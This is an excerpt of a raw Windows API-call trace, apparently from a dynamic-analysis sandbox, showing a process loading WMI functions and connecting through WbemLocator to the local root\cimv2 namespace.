	[0068.544] CoTaskMemAlloc (cb=0x1a) returned 0x233fc650320
	[0068.544] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="ExecNotificationQueryWmi") returned 0x7ffbf68f1b90
	[0068.544] CoTaskMemFree (pv=0x233fc650320) 
	[0068.550] CoTaskMemAlloc (cb=0x10) returned 0x233fc705b60
	[0068.550] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="PutInstanceWmi") returned 0x7ffbf68f1d00
	[0068.550] CoTaskMemFree (pv=0x233fc705b60) 
	[0068.553] CoTaskMemAlloc (cb=0xd) returned 0x233fc705820
	[0068.553] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="PutClassWmi") returned 0x7ffbf68f1e00
	[0068.553] CoTaskMemFree (pv=0x233fc705820) 
	[0068.556] CoTaskMemAlloc (cb=0x1a) returned 0x233fc64ff90
	[0068.556] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="CloneEnumWbemClassObject") returned 0x7ffbf68f1f00
	[0068.556] CoTaskMemFree (pv=0x233fc64ff90) 
	[0068.559] CoTaskMemAlloc (cb=0x12) returned 0x233fc705820
	[0068.560] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="ConnectServerWmi") returned 0x7ffbf68f34c0
	[0068.560] CoTaskMemFree (pv=0x233fc705820) 
	[0068.563] IComThreadingInfo:GetCurrentApartmentType (in: This=0x233e121be30, pAptType=0x350199d390 | out: pAptType=0x350199d390*=1) returned 0x0
	[0068.563] IUnknown:QueryInterface (in: This=0x233e121be30, riid=0x233e4523c48*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x350199d498 | out: ppvObject=0x350199d498*=0x0) returned 0x80004002
	[0068.563] IUnknown:Release (This=0x233e121be30) returned 0x1
	[0068.566] IIDFromString (in: lpsz="{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}", lpiid=0x350199cb90 | out: lpiid=0x350199cb90) returned 0x0
	[0068.567] CoGetClassObject (in: rclsid=0x233fc685dd8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7ffbf57cd250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x350199ca00 | out: ppv=0x350199ca00*=0x233fc7059e0) returned 0x0
	[0068.569] WbemDefPath:IUnknown:QueryInterface (in: This=0x233fc7059e0, riid=0x7ffbf57cd2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x350199c710 | out: ppvObject=0x350199c710*=0x0) returned 0x80004002
	[0068.569] WbemDefPath:IClassFactory:CreateInstance (in: This=0x233fc7059e0, pUnkOuter=0x0, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c6f8 | out: ppvObject=0x350199c6f8*=0x233e3a02510) returned 0x0
	[0068.569] IUnknown:QueryInterface (in: This=0x233e3a02510, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c600 | out: ppvObject=0x350199c600*=0x233e3a02510) returned 0x0
	[0068.569] IUnknown:QueryInterface (in: This=0x233e3a02510, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x350199c680 | out: ppvObject=0x350199c680*=0x0) returned 0x80004002
	[0068.570] IUnknown:AddRef (This=0x233e3a02510) returned 0x3
	[0068.570] CoGetContextToken (in: pToken=0x350199c2d0 | out: pToken=0x350199c2d0) returned 0x0
	[0068.570] CoGetObjectContext (in: riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x233fc67cd38 | out: ppv=0x233fc67cd38*=0x233e121be18) returned 0x0
	[0068.570] IUnknown:QueryInterface (in: This=0x233e3a02510, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c290 | out: ppvObject=0x350199c290*=0x233fc705a00) returned 0x0
	[0068.570] IMarshal:GetUnmarshalClass (in: This=0x233fc705a00, riid=0x7ffbf57cd260, pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x350199c2c0 | out: pCid=0x350199c2c0) returned 0x0
	[0068.570] IUnknown:Release (This=0x233fc705a00) returned 0x3
	[0068.570] CoGetContextToken (in: pToken=0x350199c2a0 | out: pToken=0x350199c2a0) returned 0x0
	[0068.570] IUnknown:AddRef (This=0x233e3a02510) returned 0x4
	[0068.570] IUnknown:QueryInterface (in: This=0x233e3a02510, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c3b8 | out: ppvObject=0x350199c3b8*=0x0) returned 0x80004002
	[0068.570] IUnknown:Release (This=0x233e3a02510) returned 0x3
	[0068.571] IUnknown:Release (This=0x233e3a02510) returned 0x2
	[0068.571] WbemDefPath:IUnknown:Release (This=0x233fc7059e0) returned 0x0
	[0068.571] IUnknown:Release (This=0x233e3a02510) returned 0x1
	[0068.571] CoGetContextToken (in: pToken=0x350199cfd0 | out: pToken=0x350199cfd0) returned 0x0
	[0068.571] CoGetContextToken (in: pToken=0x350199cf10 | out: pToken=0x350199cf10) returned 0x0
	[0068.571] IUnknown:AddRef (This=0x233e3a02510) returned 0x2
	[0068.571] IUnknown:QueryInterface (in: This=0x233e3a02510, riid=0x350199d050*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x350199d030 | out: ppvObject=0x350199d030*=0x233e3a02510) returned 0x0
	[0068.572] IUnknown:Release (This=0x233e3a02510) returned 0x2
	[0068.572] IUnknown:Release (This=0x233e3a02510) returned 0x1
	[0068.572] CoGetObjectContext (in: riid=0x350199c2f8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x350199c2f0 | out: ppv=0x350199c2f0*=0x233e121be30) returned 0x0
	[0068.572] IComThreadingInfo:GetCurrentApartmentType (in: This=0x233e121be30, pAptType=0x350199c310 | out: pAptType=0x350199c310*=1) returned 0x0
	[0068.572] IUnknown:QueryInterface (in: This=0x233e121be30, riid=0x233e4523c48*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x350199c418 | out: ppvObject=0x350199c418*=0x0) returned 0x80004002
	[0068.572] IUnknown:Release (This=0x233e121be30) returned 0x2
	[0068.573] CoGetClassObject (in: rclsid=0x233fc685dd8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7ffbf57cd250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x350199b980 | out: ppv=0x350199b980*=0x233fc705b60) returned 0x0
	[0068.573] WbemDefPath:IUnknown:QueryInterface (in: This=0x233fc705b60, riid=0x7ffbf57cd2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x350199b690 | out: ppvObject=0x350199b690*=0x0) returned 0x80004002
	[0068.573] WbemDefPath:IClassFactory:CreateInstance (in: This=0x233fc705b60, pUnkOuter=0x0, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199b678 | out: ppvObject=0x350199b678*=0x233e3a02750) returned 0x0
	[0068.573] IUnknown:QueryInterface (in: This=0x233e3a02750, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199b580 | out: ppvObject=0x350199b580*=0x233e3a02750) returned 0x0
	[0068.573] IUnknown:QueryInterface (in: This=0x233e3a02750, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x350199b600 | out: ppvObject=0x350199b600*=0x0) returned 0x80004002
	[0068.573] IUnknown:AddRef (This=0x233e3a02750) returned 0x3
	[0068.573] CoGetContextToken (in: pToken=0x350199b250 | out: pToken=0x350199b250) returned 0x0
	[0068.573] IUnknown:QueryInterface (in: This=0x233e3a02750, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199b210 | out: ppvObject=0x350199b210*=0x233fc705820) returned 0x0
	[0068.574] IMarshal:GetUnmarshalClass (in: This=0x233fc705820, riid=0x7ffbf57cd260, pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x350199b240 | out: pCid=0x350199b240) returned 0x0
	[0068.574] IUnknown:Release (This=0x233fc705820) returned 0x3
	[0068.574] CoGetContextToken (in: pToken=0x350199b220 | out: pToken=0x350199b220) returned 0x0
	[0068.574] IUnknown:AddRef (This=0x233e3a02750) returned 0x4
	[0068.574] IUnknown:QueryInterface (in: This=0x233e3a02750, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199b338 | out: ppvObject=0x350199b338*=0x0) returned 0x80004002
	[0068.574] IUnknown:Release (This=0x233e3a02750) returned 0x3
	[0068.574] IUnknown:Release (This=0x233e3a02750) returned 0x2
	[0068.574] WbemDefPath:IUnknown:Release (This=0x233fc705b60) returned 0x0
	[0068.574] IUnknown:Release (This=0x233e3a02750) returned 0x1
	[0068.574] CoGetContextToken (in: pToken=0x350199bf50 | out: pToken=0x350199bf50) returned 0x0
	[0068.574] CoGetContextToken (in: pToken=0x350199be90 | out: pToken=0x350199be90) returned 0x0
	[0068.574] IUnknown:AddRef (This=0x233e3a02750) returned 0x2
	[0068.574] IUnknown:QueryInterface (in: This=0x233e3a02750, riid=0x350199bfd0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x350199bfb0 | out: ppvObject=0x350199bfb0*=0x233e3a02750) returned 0x0
	[0068.574] IUnknown:Release (This=0x233e3a02750) returned 0x2
	[0068.575] IUnknown:Release (This=0x233e3a02750) returned 0x1
	[0068.575] CoGetContextToken (in: pToken=0x350199c0d0 | out: pToken=0x350199c0d0) returned 0x0
	[0068.575] CoGetContextToken (in: pToken=0x350199c010 | out: pToken=0x350199c010) returned 0x0
	[0068.575] IUnknown:AddRef (This=0x233e3a02750) returned 0x2
	[0068.575] IUnknown:QueryInterface (in: This=0x233e3a02750, riid=0x350199c150*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x350199c130 | out: ppvObject=0x350199c130*=0x233e3a02750) returned 0x0
	[0068.575] IUnknown:Release (This=0x233e3a02750) returned 0x2
	[0068.575] IUnknown:AddRef (This=0x233e3a02750) returned 0x3
	[0068.575] IWbemPath:SetText (This=0x233e3a02750, uMode=0x4, pszPath="//./root/cimv2") returned 0x0
	[0068.575] IUnknown:Release (This=0x233e3a02750) returned 0x2
	[0068.576] CoGetContextToken (in: pToken=0x350199d150 | out: pToken=0x350199d150) returned 0x0
	[0068.576] CoGetContextToken (in: pToken=0x350199d090 | out: pToken=0x350199d090) returned 0x0
	[0068.576] IUnknown:AddRef (This=0x233e3a02510) returned 0x2
	[0068.576] IUnknown:QueryInterface (in: This=0x233e3a02510, riid=0x350199d1d0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x350199d1b0 | out: ppvObject=0x350199d1b0*=0x233e3a02510) returned 0x0
	[0068.576] IUnknown:Release (This=0x233e3a02510) returned 0x2
	[0068.576] IUnknown:AddRef (This=0x233e3a02510) returned 0x3
	[0068.576] IWbemPath:SetText (This=0x233e3a02510, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.576] IUnknown:Release (This=0x233e3a02510) returned 0x2
	[0068.577] IWbemPath:GetNamespaceCount (in: This=0x233e3a02510, puCount=0x350199d460 | out: puCount=0x350199d460*=0x2) returned 0x0
	[0068.577] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199d460*=0x0, pszText=0x0 | out: puBuffLength=0x350199d460*=0x17, pszText=0x0) returned 0x0
	[0068.577] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199d460*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199d460*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.578] IWbemPath:GetNamespaceCount (in: This=0x233e3a02510, puCount=0x350199d410 | out: puCount=0x350199d410*=0x2) returned 0x0
	[0068.578] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199d410*=0x0, pszText=0x0 | out: puBuffLength=0x350199d410*=0x17, pszText=0x0) returned 0x0
	[0068.578] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199d410*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199d410*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.579] CoGetObjectContext (in: riid=0x350199d348*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x350199d340 | out: ppv=0x350199d340*=0x233e121be30) returned 0x0
	[0068.579] IComThreadingInfo:GetCurrentApartmentType (in: This=0x233e121be30, pAptType=0x350199d360 | out: pAptType=0x350199d360*=1) returned 0x0
	[0068.579] IUnknown:QueryInterface (in: This=0x233e121be30, riid=0x233e4523c48*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x350199d468 | out: ppvObject=0x350199d468*=0x0) returned 0x80004002
	[0068.579] IUnknown:Release (This=0x233e121be30) returned 0x2
	[0068.579] IIDFromString (in: lpsz="{4590F811-1D3A-11D0-891F-00AA004B2E24}", lpiid=0x350199d180 | out: lpiid=0x350199d180) returned 0x0
	[0068.580] CoGetClassObject (in: rclsid=0x233fc685c98*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x7ffbf57cd250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x350199cff0 | out: ppv=0x350199cff0*=0x233fc7041c0) returned 0x0
	[0068.580] WbemLocator:IUnknown:QueryInterface (in: This=0x233fc7041c0, riid=0x7ffbf57cd2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x350199cd00 | out: ppvObject=0x350199cd00*=0x0) returned 0x80004002
	[0068.580] WbemLocator:IClassFactory:CreateInstance (in: This=0x233fc7041c0, pUnkOuter=0x0, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199cce8 | out: ppvObject=0x350199cce8*=0x233fc704240) returned 0x0
	[0068.580] WbemLocator:IUnknown:QueryInterface (in: This=0x233fc704240, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199cbf0 | out: ppvObject=0x350199cbf0*=0x233fc704240) returned 0x0
	[0068.580] WbemLocator:IUnknown:QueryInterface (in: This=0x233fc704240, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x350199cc70 | out: ppvObject=0x350199cc70*=0x0) returned 0x80004002
	[0068.580] WbemLocator:IUnknown:AddRef (This=0x233fc704240) returned 0x3
	[0068.580] CoGetContextToken (in: pToken=0x350199c8c0 | out: pToken=0x350199c8c0) returned 0x0
	[0068.580] WbemLocator:IUnknown:QueryInterface (in: This=0x233fc704240, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c880 | out: ppvObject=0x350199c880*=0x0) returned 0x80004002
	[0068.580] CoGetContextToken (in: pToken=0x350199c890 | out: pToken=0x350199c890) returned 0x0
	[0068.581] WbemLocator:IUnknown:AddRef (This=0x233fc704240) returned 0x4
	[0068.581] WbemLocator:IUnknown:QueryInterface (in: This=0x233fc704240, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c9a8 | out: ppvObject=0x350199c9a8*=0x0) returned 0x80004002
	[0068.581] WbemLocator:IUnknown:Release (This=0x233fc704240) returned 0x3
	[0068.581] WbemLocator:IUnknown:Release (This=0x233fc704240) returned 0x2
	[0068.581] WbemLocator:IUnknown:Release (This=0x233fc7041c0) returned 0x0
	[0068.581] WbemLocator:IUnknown:Release (This=0x233fc704240) returned 0x1
	[0068.581] CoGetContextToken (in: pToken=0x350199ceb0 | out: pToken=0x350199ceb0) returned 0x0
	[0068.581] CoGetContextToken (in: pToken=0x350199cdf0 | out: pToken=0x350199cdf0) returned 0x0
	[0068.581] WbemLocator:IUnknown:AddRef (This=0x233fc704240) returned 0x2
	[0068.581] WbemLocator:IUnknown:QueryInterface (in: This=0x233fc704240, riid=0x350199cf30*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x350199cf10 | out: ppvObject=0x350199cf10*=0x233fc704240) returned 0x0
	[0068.582] WbemLocator:IUnknown:Release (This=0x233fc704240) returned 0x2
	[0068.582] WbemLocator:IUnknown:Release (This=0x233fc704240) returned 0x1
	[0068.582] IWbemPath:GetNamespaceCount (in: This=0x233e3a02510, puCount=0x350199d310 | out: puCount=0x350199d310*=0x2) returned 0x0
	[0068.582] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=8, puBuffLength=0x350199d310*=0x0, pszText=0x0 | out: puBuffLength=0x350199d310*=0x17, pszText=0x0) returned 0x0
	[0068.582] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=8, puBuffLength=0x350199d310*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199d310*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.587] CoCreateInstance (in: rclsid=0x7ffbf68f15a8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ffbf68f14d8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x350199cf80 | out: ppv=0x350199cf80*=0x233fc704160) returned 0x0
	[0068.587] WbemLocator:IWbemLocator:ConnectServer (in: This=0x233fc704160, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x350199d210 | out: ppNamespace=0x350199d210*=0x233e39e5ae0) returned 0x0
	[0068.613] IUnknown:QueryInterface (in: This=0x233e39e5ae0, riid=0x7ffbf68f1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199cdf8 | out: ppvObject=0x350199cdf8*=0x233e399fcc0) returned 0x0
	[0068.613] IClientSecurity:QueryBlanket (in: This=0x233e399fcc0, pProxy=0x233e39e5ae0, pAuthnSvc=0x350199cdf0, pAuthzSvc=0x350199cdec, pServerPrincName=0x350199ce18, pAuthnLevel=0x350199cde8, pImpLevel=0x350199ce04, pAuthInfo=0x350199ce28, pCapabilites=0x350199ce00 | out: pAuthnSvc=0x350199cdf0*=0xa, pAuthzSvc=0x350199cdec*=0x0, pServerPrincName=0x350199ce18, pAuthnLevel=0x350199cde8*=0x6, pImpLevel=0x350199ce04*=0x3, pAuthInfo=0x350199ce28, pCapabilites=0x350199ce00*=0x1) returned 0x0
	[0068.613] IUnknown:Release (This=0x233e399fcc0) returned 0x1
	[0068.613] IUnknown:QueryInterface (in: This=0x233e39e5ae0, riid=0x7ffbf68f1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199cd98 | out: ppvObject=0x350199cd98*=0x233e399fd08) returned 0x0
	[0068.613] IUnknown:QueryInterface (in: This=0x233e39e5ae0, riid=0x7ffbf68f1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199cd28 | out: ppvObject=0x350199cd28*=0x233e399fcc0) returned 0x0
	[0068.613] IClientSecurity:SetBlanket (This=0x233e399fcc0, pProxy=0x233e39e5ae0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0068.614] IUnknown:Release (This=0x233e399fcc0) returned 0x2
	[0068.614] IUnknown:Release (This=0x233e399fd08) returned 0x1
	[0068.614] CoTaskMemFree (pv=0x233fc650110) 
	[0068.614] WbemLocator:IUnknown:Release (This=0x233fc704160) returned 0x0
	[0068.614] IUnknown:QueryInterface (in: This=0x233e39e5ae0, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199ca10 | out: ppvObject=0x350199ca10*=0x233e399fd08) returned 0x0
	[0068.614] IUnknown:QueryInterface (in: This=0x233e399fd08, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x350199ca90 | out: ppvObject=0x350199ca90*=0x0) returned 0x80004002
	[0068.614] IUnknown:QueryInterface (in: This=0x233e399fd08, riid=0x7ffbf57cd2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x350199c828 | out: ppvObject=0x350199c828*=0x0) returned 0x80004002
	[0068.614] IUnknown:AddRef (This=0x233e399fd08) returned 0x3
	[0068.614] CoGetContextToken (in: pToken=0x350199c6e0 | out: pToken=0x350199c6e0) returned 0x0
	[0068.615] IUnknown:QueryInterface (in: This=0x233e399fd08, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c6a0 | out: ppvObject=0x350199c6a0*=0x233e399fbe8) returned 0x0
	[0068.615] IMarshal:GetUnmarshalClass (in: This=0x233e399fbe8, riid=0x7ffbf57cd260, pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x350199c6d0 | out: pCid=0x350199c6d0) returned 0x0
	[0068.615] IUnknown:Release (This=0x233e399fbe8) returned 0x3
	[0068.615] CoGetContextToken (in: pToken=0x350199c6b0 | out: pToken=0x350199c6b0) returned 0x0
	[0068.615] IUnknown:AddRef (This=0x233e399fd08) returned 0x4
	[0068.615] IUnknown:QueryInterface (in: This=0x233e399fd08, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c7c8 | out: ppvObject=0x350199c7c8*=0x233e399fcd0) returned 0x0
	[0068.615] IUnknown:Release (This=0x233e399fd08) returned 0x4
	[0068.615] IRpcOptions:Query (in: This=0x233e399fcd0, pPrx=0x233e399fd08, dwProperty=2, pdwValue=0x350199c838 | out: pdwValue=0x350199c838) returned 0x80004002
	[0068.615] IUnknown:Release (This=0x233e399fcd0) returned 0x3
	[0068.615] IUnknown:Release (This=0x233e399fd08) returned 0x2
	[0068.615] CoGetContextToken (in: pToken=0x350199cbb0 | out: pToken=0x350199cbb0) returned 0x0
	[0068.615] CoGetContextToken (in: pToken=0x350199caf0 | out: pToken=0x350199caf0) returned 0x0
	[0068.615] IUnknown:AddRef (This=0x233e399fd08) returned 0x3
	[0068.615] IUnknown:QueryInterface (in: This=0x233e399fd08, riid=0x350199cc30*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x350199cc10 | out: ppvObject=0x350199cc10*=0x233e39e5ae0) returned 0x0
	[0068.615] IUnknown:Release (This=0x233e399fd08) returned 0x3
	[0068.616] IUnknown:Release (This=0x233e39e5ae0) returned 0x2
	[0068.616] IUnknown:Release (This=0x233e39e5ae0) returned 0x1
	[0068.617] SysStringLen (param_1=0x0) returned 0x0
